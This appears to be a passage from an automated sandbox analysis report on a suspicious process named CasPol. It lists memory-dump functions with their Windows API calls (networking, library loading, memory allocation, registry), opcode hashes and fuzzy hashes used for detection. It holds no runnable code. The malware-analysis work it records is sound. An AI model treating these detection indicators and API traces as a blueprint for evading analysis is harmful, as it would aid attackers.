Opcode Fuzzy Hash: 4b1c4c9abc4b44ed7540c3e7eabc3c1c9ff44b410ae0658099af3422dc231c5b
Instruction Fuzzy Hash: 531126715053806FD311CB15DC81F72BFB8EF86A20F04819AFD488B692D274B919CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1C26 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1C8A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 96ffeac20c49191559c5b6b7d594e002d56e26ddc934783b886b4bf8caa270b8
Instruction ID: 173bf06eeeb9281136ecf6dda729715b14fcf17cdcef19f76367850d467c706f
Opcode Fuzzy Hash: 96ffeac20c49191559c5b6b7d594e002d56e26ddc934783b886b4bf8caa270b8
Instruction Fuzzy Hash: 0911B671500208AEE711CF55DD84FA6FBDCEF44720F1484AAEA45AB241D674A5048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF378E Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF37EA

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 69743f4a5022009edd5aa3f7242344da8f19072c30e65a361a3006731f707480
Instruction ID: ee601437a47df1d3c7cc67a4a8f498f85dcaa3bda0cd85024b584bfdd4c867be
Opcode Fuzzy Hash: 69743f4a5022009edd5aa3f7242344da8f19072c30e65a361a3006731f707480
Instruction Fuzzy Hash: 0311B671504244AFEB209F25DD45BB6FBA8EF44710F14846AFD459B281D674E904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AAD2A Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 1D2AAD86

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 9ad3e2d75406b4a941bf75ee8096ab550a457a9fa17ac3fcb7e0b9839e71b4c3
Instruction ID: 352ff2b38ae825d8fa379c597c2c6918cfc7a2950a205baccaf3d67d48c2adc1
Opcode Fuzzy Hash: 9ad3e2d75406b4a941bf75ee8096ab550a457a9fa17ac3fcb7e0b9839e71b4c3
Instruction Fuzzy Hash: 5011E271500600AFE711CF69DD84B67FBA8EF44720F14C46AED899B641D675A804CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF440E Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF446F

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 334b92fde2d14df9e542bcb66d9fd4065b22ff13cc14928e4dc738e524c41e1a
Instruction ID: 84cbbe02a6e1324977f8cffe46e0e508c40ae7eb51e7ba33cef4b89055dd6997
Opcode Fuzzy Hash: 334b92fde2d14df9e542bcb66d9fd4065b22ff13cc14928e4dc738e524c41e1a
Instruction Fuzzy Hash: 711190B1500204AEE720CF15DD84FA7FBECEF44720F14C4AAEE59EB281D674A9048A71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0ECC Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,?), ref: 00EF0F3E

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c69e134aed0a7f01c058b519bf9927e8cc637ee4fc25697b6bfc1a1f00813255
Instruction ID: 83c0c0c990f5c9dad8eeb2283d514abb0bc1c11237f74c499220a58bc5a76adc
Opcode Fuzzy Hash: c69e134aed0a7f01c058b519bf9927e8cc637ee4fc25697b6bfc1a1f00813255
Instruction Fuzzy Hash: 5E216D764093C49FDB238B24DC54B62BFB4AF46324F0984DAEA849F153D2659808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA48A Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,AA0DAAB3,00000000,?,?,?,?,?,?,?,?,72DE3C38), ref: 1D2AA4E8

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5cc64053d821a6bd101846e45f1e57b15d06ae0c6bdef73761fa6f32b5b3a979
Instruction ID: 4cd9d95d3be28afda9287edc53aa4f3f26615ed1402cb90abc8bb667472fa183
Opcode Fuzzy Hash: 5cc64053d821a6bd101846e45f1e57b15d06ae0c6bdef73761fa6f32b5b3a979
Instruction Fuzzy Hash: 3D114F7140E3C45FD7138B259C54A62BFB4DF47620F0980DBDD858F5A3D2699809CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0AD2 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF0B31

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b053c540e5a126f25ceceb1b9bbeb4bed4792a66defe1117466dc5714a30eaf3
Instruction ID: 9a2f978e1a81c7b967a56522ffd0167c0547256444c2b67caf83e2fd857680b6
Opcode Fuzzy Hash: b053c540e5a126f25ceceb1b9bbeb4bed4792a66defe1117466dc5714a30eaf3
Instruction Fuzzy Hash: DE11E771500204AFEB21CF55DD44FA6FBA8EF44724F14C4AAEE49AB252C374A404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF3876 Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF38D2

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 81d5709f2dc218a261202df7a5a19f9b6d39ca8aaeee5dea8041fa08c527afc9
Instruction ID: ecde3c6d1b0e8b29e3a7cfd71917422611f1bcb71ff87265fd5644d7969b6bbf
Opcode Fuzzy Hash: 81d5709f2dc218a261202df7a5a19f9b6d39ca8aaeee5dea8041fa08c527afc9
Instruction Fuzzy Hash: EC11E771500204AFEB20DF65DD44F76FBA8EF44710F1484AAEE45AB251D274E504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF428E Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,AA0DAAB3,00000000,?,?,?,?,?,?,?,?,72DE3C38), ref: 00EF42EC

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 0404ce2d5c0c8fc0f72a33f8ca0491c3738c5deb7b5d97c839de03eabc0d82f8
Instruction ID: eb79214bb88c8d30dadb2df0ef7c1997a9892ae0cbd0ae1c66d80b45cb2293e9
Opcode Fuzzy Hash: 0404ce2d5c0c8fc0f72a33f8ca0491c3738c5deb7b5d97c839de03eabc0d82f8
Instruction Fuzzy Hash: E511B2715093C49FD7128F65DC44B66BFF4DF46220F0C84EAED859F262D275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF196A Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF19C3

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: cf19e510fd75c39cdcc884c9dd95850c93952dabc2c60f18040b9781f91ecee1
Instruction ID: 5f1716e9738872b09e74ba0bb0a017af8f643c99273f5e2eeb7691d9e0e07149
Opcode Fuzzy Hash: cf19e510fd75c39cdcc884c9dd95850c93952dabc2c60f18040b9781f91ecee1
Instruction Fuzzy Hash: 4911E371504208AEEB21CF15DD84BA6FBA8EF44724F1484AAEE49AB241C274A804CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF17AE Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1804

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: ee8b47cd6617a53078d1e6b3dfa6cfe0be0a18586fa0409a86cc181cf3d5fa41
Instruction ID: 4e722975dae81b4183cbb68faf8bff13116212fc3efe80c3e9cd094d95b1c512
Opcode Fuzzy Hash: ee8b47cd6617a53078d1e6b3dfa6cfe0be0a18586fa0409a86cc181cf3d5fa41
Instruction Fuzzy Hash: 0911E971504248AEEB11CF15DD44BB6FB98EF44720F14C4AAEE49AF241D674A405CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB093 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,AA0DAAB3,00000000,?,?,?,?), ref: 1D2AB0F7

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: a7222f6c35d8ddd1708b751198919fcaae5e6c1202af796901ebbfe8372d0bb1
Instruction ID: 9cd4014b39ff8556a6b41b5038ee61c8122fcd1b3e234d35c856e026d37c797d
Opcode Fuzzy Hash: a7222f6c35d8ddd1708b751198919fcaae5e6c1202af796901ebbfe8372d0bb1
Instruction Fuzzy Hash: 22119372409384AFDB228F55EC44B62FFB4EF46210F0885DAED898F552D375A518CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF29E6 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF2A45

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: d00f57e489a3310111133e2de9b3cf339c3f2f635e6e4f8c54487b6523bebb93
Instruction ID: cb39b0483178e273ae7aa6a7981ec52218375560fb825e59496b9f1d69fc6273
Opcode Fuzzy Hash: d00f57e489a3310111133e2de9b3cf339c3f2f635e6e4f8c54487b6523bebb93
Instruction Fuzzy Hash: 6E11E071500604AFEB208F15DD80FB6FBA8EF44720F04C4AEEE85AA251D375A809CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF01D6 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EA4), ref: 00EF023F

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bd466e91959179173629b7caa327fc9fe1be84555e88054ff618c787932c7b58
Instruction ID: 88b5f4f68f22c02c026ec96bac0e35f3176e2157df1846f5b5978933aca87679
Opcode Fuzzy Hash: bd466e91959179173629b7caa327fc9fe1be84555e88054ff618c787932c7b58
Instruction Fuzzy Hash: 1C11E571504204AEFB209B19DD85BB6FB98DF44720F14C09AFE456A292D2B8A948CA75

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1D0A Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1D63

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 7541777289f78fb633eeae9d21e262070ae6a235dd1dd22dd9c5738ad81bebdb
Instruction ID: 2a463447441e2e2c1e3c8f3ad33616d4e60dd19d94b3a996f5837916d1b39856
Opcode Fuzzy Hash: 7541777289f78fb633eeae9d21e262070ae6a235dd1dd22dd9c5738ad81bebdb
Instruction Fuzzy Hash: F0110871500708AFEB208F15DD44F76FBA8EF44720F14C4AAEE456B251D375A804CA71

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB70C Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1D2AB768

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b851e8a08905de33d74fe3dfda0dedb9e6b92c81df75be0c2d766b019d54298a
Instruction ID: f4a8b1953e457bb2cc6900eb3f0a4812f8865c4486943f67b22dd70248192e71
Opcode Fuzzy Hash: b851e8a08905de33d74fe3dfda0dedb9e6b92c81df75be0c2d766b019d54298a
Instruction Fuzzy Hash: C71142754093C49FD712CF25DC44B66BFB4DF46320F0984DADD899F252D275A448CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1D2AA0D5

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 2dd241fafc3ab3a8949fa4283d513f34a48615e18be1be5194a582635efcc996
Instruction ID: 948eead80bbf61ef4152144294563a5fc303e35beb027543b30dde5decd7ed30
Opcode Fuzzy Hash: 2dd241fafc3ab3a8949fa4283d513f34a48615e18be1be5194a582635efcc996
Instruction Fuzzy Hash: E8118F75409380AFD722CF15DD44B62FFB4EF46224F08849AED899F652D275A418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF256E Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF25C4

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 1a562f83b488448e4ace11b6815bc657d0a23b732596a5085b2a8d72ce73ae7b
Instruction ID: dc80fb7664be2dc11f8521e095e05e8b0c33275de5c1656e11fb0c93cf86a90e
Opcode Fuzzy Hash: 1a562f83b488448e4ace11b6815bc657d0a23b732596a5085b2a8d72ce73ae7b
Instruction Fuzzy Hash: 6601C471504204AFEB208F19DD85BB6FB98EF44720F14C0AAEE45AB241D778A945CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA89A Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D2AA8E2

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a210aa3cef700a39ebb219c0c3598fd3420828b918188c6fc0853b7b29412f1b
Instruction ID: 81eca6226f9da19183fa7606a1c6d9e0e88ebb91a648810e751029d7af4be66d
Opcode Fuzzy Hash: a210aa3cef700a39ebb219c0c3598fd3420828b918188c6fc0853b7b29412f1b
Instruction Fuzzy Hash: 08117C72A042418FD710CF29D884B67FBE8EF04720F0880AADD59DBA42D274E808CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0942 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF0995

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: dcf300d3de743fd4f64770ab793fa6a1e9dd2a641dd3f7fa21dc617ad8cd0166
Instruction ID: 2802b2507654c700ccf15c5fcbff5bbab144a7b3ae0f8f1d74564873f11516b7
Opcode Fuzzy Hash: dcf300d3de743fd4f64770ab793fa6a1e9dd2a641dd3f7fa21dc617ad8cd0166
Instruction Fuzzy Hash: 1801D671505204AEE710CB19DD45BB6FB98DF84720F14C0AAEE85AB242D2B8A9048A72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF2ABA Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00EF2B06

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: a4eb33c34983cf4a9ced7fd7420c667f0cf90bf74d8d3176dca0f1c80d3fe08c
Instruction ID: d239ea747e6aab236a9cd2042b933cc8c8f518d8d2623d5f1494bd4ee92dabd2
Opcode Fuzzy Hash: a4eb33c34983cf4a9ced7fd7420c667f0cf90bf74d8d3176dca0f1c80d3fe08c
Instruction Fuzzy Hash: DF11AC315006049FDB21CF55D844B62FBE4EF08310F0885AADE4A9B622D375E808DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF2426 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 00EF2476

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 1aa01bdedb034d3e43dc8bdeebbdce428286854311ad23ac2841a6d1d6f66c46
Instruction ID: bdd734db33ac36cf0fd2592857d0a3445626762f3c2c7894aed54172af14c371
Opcode Fuzzy Hash: 1aa01bdedb034d3e43dc8bdeebbdce428286854311ad23ac2841a6d1d6f66c46
Instruction Fuzzy Hash: 8B017171500200ABD750DF1ADD85B26FBA8FF88B20F14816AED089B681D275B915CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1B7E Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000EA4,?,?), ref: 00EF1BCE

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: e58e97f80563ca3cc1084a246ba7919a33d0913e24cebf42b343204af43c15b0
Instruction ID: 685158a1678830a3230137a79607d00d960750a682f01bbc32c4279aaf4bbc83
Opcode Fuzzy Hash: e58e97f80563ca3cc1084a246ba7919a33d0913e24cebf42b343204af43c15b0
Instruction Fuzzy Hash: 7E017171500200ABD750DF1ADD85B26FBA8EF88B20F14816AED099B681D375B915CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AAF32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D2AAF82

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 27ec95021b90e30a6c9ab6cf53e1b1645f92c051664a43712eb6fe7bd0c10c41
Instruction ID: e939e1d0f2c399ed19710e99930e0d01ba403f7d1025316338f289e8571d1cc7
Opcode Fuzzy Hash: 27ec95021b90e30a6c9ab6cf53e1b1645f92c051664a43712eb6fe7bd0c10c41
Instruction Fuzzy Hash: CC017171500200ABD750DF1ADD85B26FBA8EF88B20F14816AED089B681D275B915CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 00EF4682 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EF46C6

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5a221f697e6e7ceead2b06054281f1b16d25758f439abfa00800d9b104910786
Instruction ID: 8f257b36037a77ca2200174921a50390ab0ee3e6d07793f300be9a27eb5ebcfc
Opcode Fuzzy Hash: 5a221f697e6e7ceead2b06054281f1b16d25758f439abfa00800d9b104910786
Instruction Fuzzy Hash: CD01AD728006049FDB218F55D944B62FFE0EF09320F0885AADE899A652D375E418DF72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB0B6 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,AA0DAAB3,00000000,?,?,?,?), ref: 1D2AB0F7

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: ad430194a9a87f046532d8989c10b2b0bc50c6f698b9aab1cb3fcc4a8fe5b942
Instruction ID: 7d99adf42bff148d950e7616dba0cd514af6e200163f1d53168c467a6a0c2589
Opcode Fuzzy Hash: ad430194a9a87f046532d8989c10b2b0bc50c6f698b9aab1cb3fcc4a8fe5b942
Instruction Fuzzy Hash: 3901C0319002409FDB21CF55E844B62FBE0FF44320F08C8AADD494BA12D375A418CF72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF42BA Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,AA0DAAB3,00000000,?,?,?,?,?,?,?,?,72DE3C38), ref: 00EF42EC

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 0481da665a808094d1d823eee7da0b7ebe7267ceb1c1bd0aa4557bb578051ca4
Instruction ID: 334a87eba05fa945c60f1e3e4df33a0006a17836408cf84f3e1fe1da39a8300e
Opcode Fuzzy Hash: 0481da665a808094d1d823eee7da0b7ebe7267ceb1c1bd0aa4557bb578051ca4
Instruction Fuzzy Hash: 4A01D475A042048FDB10CF19D884776FBA4DF40320F08C0AADD099F792D278E904CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0C8A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 00EF0CDA

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 7528089a5e2fc9ae79e5740803bbe34f772292542b5f695131d1f37b0a8001a1
Instruction ID: ba43083948c3079aec112120f2acc50000927299f412bf1fd9b809ef7ff9b90f
Opcode Fuzzy Hash: 7528089a5e2fc9ae79e5740803bbe34f772292542b5f695131d1f37b0a8001a1
Instruction Fuzzy Hash: 3B014F71500600ABD250DF1ADD86B26FBA4EB89B20F14815AED085B681D275B916CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00EF401A Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 00EF406A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 27703ae18f5fdd159942f646eb110f8f9a4a88719a3c6ed47c2d3381d889d201
Instruction ID: 2ac466fdcacd2c08a427007e1e3cae3d66f79719e1fd6f6441591f65276248da
Opcode Fuzzy Hash: 27703ae18f5fdd159942f646eb110f8f9a4a88719a3c6ed47c2d3381d889d201
Instruction Fuzzy Hash: 9A018F71500200ABD250DF1ADD82B22FBA4EB88B20F14811AED084B681D371B916CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA76E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D2AA7BE

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

